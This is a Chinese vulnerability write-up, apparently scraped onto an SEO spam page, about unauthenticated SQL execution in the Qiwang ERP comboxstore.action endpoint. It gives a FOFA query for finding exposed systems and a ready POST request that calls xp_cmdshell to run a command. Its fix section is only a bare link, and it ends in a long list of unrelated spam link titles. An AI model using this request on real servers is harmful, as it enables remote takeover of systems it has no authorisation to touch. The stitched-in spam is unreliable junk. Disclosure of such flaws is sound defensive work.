当前位置: 首页 > news >正文

信誉好的合肥网站建设病毒式营销案例

信誉好的合肥网站建设,病毒式营销案例,给网站做绝对路径,文档下载网站 建设漏洞描述 由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。 免责声明 技术文章仅供参考,任何个人和组织…

漏洞描述

由于企望制造 ERP comboxstore.action接口权限设置不当,默认的配置可执行任意SQL语句,利用xp_cmdshell函数可远程执行命令,未经认证的攻击者可通过该漏洞获取服务器权限。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa:title="企望制造ERP系统"

漏洞复现

1.利用如下POC发起POST请求执行whoami命令得到回显


POST /mainFunctions/comboxstore.action HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 56comboxsql=exec%20xp_cmdshell%20'whoami'

在这里插入图片描述

修复方案

http://www.mmbaike.com/news/110020.html

相关文章:

  • 百度网站解封下载百度app免费下载安装
  • 不花钱的网站怎么做互联网产品营销策划方案
  • 获取iis中网站日志文件保存路径怎样自己开发一款软件
  • 如何免费做推广深圳网站seo优化
  • 网页设计类网站哈尔滨seo优化公司
  • 张云网站建设网站做外链平台有哪些
  • 哪个网站做木材批发的企业推广网络营销
  • 做麻将网站推广电话
  • 青岛做网站多少钱深圳网络营销推广培训
  • wordpress建站系统长沙网站seo源头厂家
  • 门户网站建设意见网络营销具有什么特点
  • 网站建设分享文章成都门户网站建设
  • 机关网站建设的请示互联网营销是什么意思
  • discuz企业网站模板河南做网站优化
  • 平凉崆峒建设局网站企业网站推广的形式有
  • 政府网站开发项目短视频关键词seo优化
  • 给我免费播放片国语电影seo费用
  • 网站ui设计基础产品软文范例800字
  • 如何开发一个视频网站pc网站优化排名软件
  • 在哪个网站做注册资本变更域名大全免费网站
  • 佛山营销手机网站建设必应搜索网站
  • 旅游网站组织结构图怎么做郑州网站优化哪家好
  • 给公司怎么做官方网站如何查看网站权重
  • 企业网站建设方案应该怎么做朋友圈产品推广文案
  • 开发网站开票名称是什么原因逆冬seo
  • 网站的开发环境设计seo顾问阿亮博客
  • 东城网站制作公司南京网站设计公司大全
  • 深圳龙岗高端网站建设模板建站和开发网站区别
  • 做政务网站网站宣传费用
  • 陕西网站建设宣传方案百度一下百度知道